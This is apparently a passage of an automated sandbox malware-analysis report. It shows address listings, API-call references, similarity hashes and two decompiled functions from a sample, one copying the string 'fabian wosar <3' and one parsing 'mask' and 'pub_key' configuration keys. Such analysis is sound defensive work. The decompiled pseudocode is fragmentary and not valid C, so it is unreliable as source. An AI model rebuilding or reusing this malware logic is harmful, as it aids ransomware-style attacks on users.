                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d4d7d
                                        0x00000000
                                        0x0f9d4d77
                                        0x00000000
                                        0x0f9d4d68
                                        0x00000000
                                        0x0f9d4d84
                                        0x0f9d4d84
                                        0x0f9d4d87
                                        0x0f9d4d88
                                        0x0f9d4d89
                                        0x0f9d4d8d
                                        0x00000000
                                        0x0f9d4d58
                                        0x0f9d4d52
                                        0x0f9d4cfb
                                        0x0f9d4cfb
                                        0x0f9d4cff
                                        0x0f9d4d35
                                        0x0f9d4d49
                                        0x0f9d4d01
                                        0x0f9d4d03
                                        0x0f9d4d05
                                        0x0f9d4d05
                                        0x0f9d4d09
                                        0x0f9d4d27
                                        0x0f9d4d2a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d4d0b
                                        0x0f9d4d10
                                        0x0f9d4d10
                                        0x0f9d4d14
                                        0x00000000
                                        0x00000000
                                        0x0f9d4d1d
                                        0x0f9d4d1f
                                        0x00000000
                                        0x0f9d4d21
                                        0x0f9d4d21
                                        0x0f9d4d25
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d4d25
                                        0x00000000
                                        0x0f9d4d1f
                                        0x00000000
                                        0x0f9d4d10
                                        0x00000000
                                        0x0f9d4d2c
                                        0x0f9d4d2c
                                        0x0f9d4d2f
                                        0x0f9d4d30
                                        0x0f9d4d31
                                        0x00000000
                                        0x0f9d4d05
                                        0x0f9d4cff
                                        0x00000000

                                        APIs
                                        • lstrcpyA.KERNEL32(?,fabian wosar <3,?,0F9D5034), ref: 0F9D4D3D
                                        • lstrlenA.KERNEL32(00000000,?,0F9D5034), ref: 0F9D4D97
                                        • lstrcpyA.KERNEL32(?,?,?,0F9D5034), ref: 0F9D4DC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID: fabian wosar <3
                                        • API String ID: 367037083-1724090804
                                        • Opcode ID: 412a329dc0b7dbad1ccf363e3dd7b9b465e37444ced1a8d346a901f423907529
                                        • Instruction ID: 673b918679bf427c4e54f02d159f0e369767471d9fc70112bb3fadab08324379
                                        • Opcode Fuzzy Hash: 412a329dc0b7dbad1ccf363e3dd7b9b465e37444ced1a8d346a901f423907529
                                        • Instruction Fuzzy Hash: 6C3105258082A94BDB32CE7C54643FABFA9AF47201FB8D589E8C55B287D231744EC790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D3190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0F9D3190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}






                                        0x0f9d3193
                                        0x0f9d3197
                                        0x0f9d319c
                                        0x0f9d31b0
                                        0x0f9d31b9
                                        0x0f9d31ce
                                        0x0f9d31d1
                                        0x0f9d31d9
                                        0x0f9d31e1
                                        0x0f9d31e4
                                        0x0f9d31e9
                                        0x0f9d31a0
                                        0x0f9d31a0
                                        0x0f9d31a0
                                        0x0f9d31a4
                                        0x00000000
                                        0x00000000
                                        0x0f9d31a8
                                        0x0f9d31ec
                                        0x00000000
                                        0x0f9d31aa
                                        0x0f9d31aa
                                        0x0f9d31ae
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d31ae
                                        0x00000000
                                        0x0f9d31a8
                                        0x0f9d31f5
                                        0x0f9d31f5
                                        0x00000000

                                        APIs
                                        • lstrcmpiA.KERNEL32(0F9D52F0,mask,0F9D52F1,?,?,0F9D3441,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D31B9
                                        • lstrcmpiA.KERNEL32(0F9D52F0,pub_key,?,0F9D3441,0F9D52F1,00000000,00000000,74CB6980,?,?,0F9D52F0,00000000), ref: 0F9D31D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpi
                                        • String ID: mask$pub_key
                                        • API String ID: 1586166983-1355590148
                                        • Opcode ID: dc83947407bc56870ee006937442ba29ab4ce0eb6c6c6e77889f462621b3af5e
                                        • Instruction ID: e71e890305bd38e5069b66116b8f61ade97e9b1cfc5e01979753ba9f99c97e9f
                                        • Opcode Fuzzy Hash: dc83947407bc56870ee006937442ba29ab4ce0eb6c6c6e77889f462621b3af5e
                                        • Instruction Fuzzy Hash: 33F046723082861EF7354E68DC45BA1BBCC9B42312FB4847EF78AC21C2C2AA9881C351
                                        Uniqueness

                                        Uniqueness Score: -1.00%